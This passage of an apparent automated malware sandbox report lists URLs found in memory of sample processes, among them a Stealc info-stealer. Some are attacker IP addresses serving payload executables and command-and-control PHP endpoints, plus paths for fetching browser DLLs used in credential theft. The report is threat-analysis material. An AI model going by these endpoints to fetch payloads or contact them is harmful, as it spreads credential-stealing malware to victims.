Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exeP
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe(P
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ineer
Source: stealc_default2.exe, 00000017.00000002.3068872284.0000000000ADD000.00000004.00000001.01000000.00000012.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3068872284.000000000096C000.00000004.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php6
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpB
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpN
Source: stealc_default2.exe, 00000017.00000003.2939108563.000000000110A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpTK
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpZ
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpdll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phperbird
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpf
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpr
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phprowser
Source: stealc_default2.exe, 00000017.00000002.3068872284.0000000000ADD000.00000004.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php~
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/A
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/H
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll&
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dlll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll~
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllb
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllh
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllz
Source: stealc_default2.exe, 00000017.00000002.3070584798.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllrowser
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll4
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllB
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllF
Source: stealc_default2.exe, 00000017.00000002.3068872284.000000000099A000.00000004.00000001.01000000.00000012.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll)
Source: stealc_default2.exe, 00000017.00000002.3068872284.0000000000ADD000.00000004.00000001.01000000.00000012.sdmp String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.17nm
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.26/Nework.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.116.215.195/12dsvc.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.116.215.195/12dsvc.exeZ
Source: svchost015.exe, 0000001E.00000002.3324897526.000000000043C000.00000040.00000400.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/#0
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158//
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/2.233.158/ppData
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/freebl3.dllG
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/freebl3.dllu
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/mozglue.dll
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/mozglue.dllQ
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/msvcp140.dll
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dll
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/nss3.dllV
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/softokn3.dll
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/softokn3.dll1
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/softokn3.dlli
Source: svchost015.exe, 0000001E.00000002.3324897526.000000000046A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/sqlite3.dll
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/sqlite3.dll#
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/vcruntime140.dll
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/3836fd5700214436/vcruntime140.dll8
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpD
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpM
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpU
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpV
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpY
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpe
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpi
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phprowser
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phps
Source: svchost015.exe, 0000001E.00000002.3324897526.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phptware
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpx
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/g
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158/ta
Source: svchost015.exe, 0000001E.00000002.3324897526.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.158BGIJEH--
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsps.ssl.com0
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
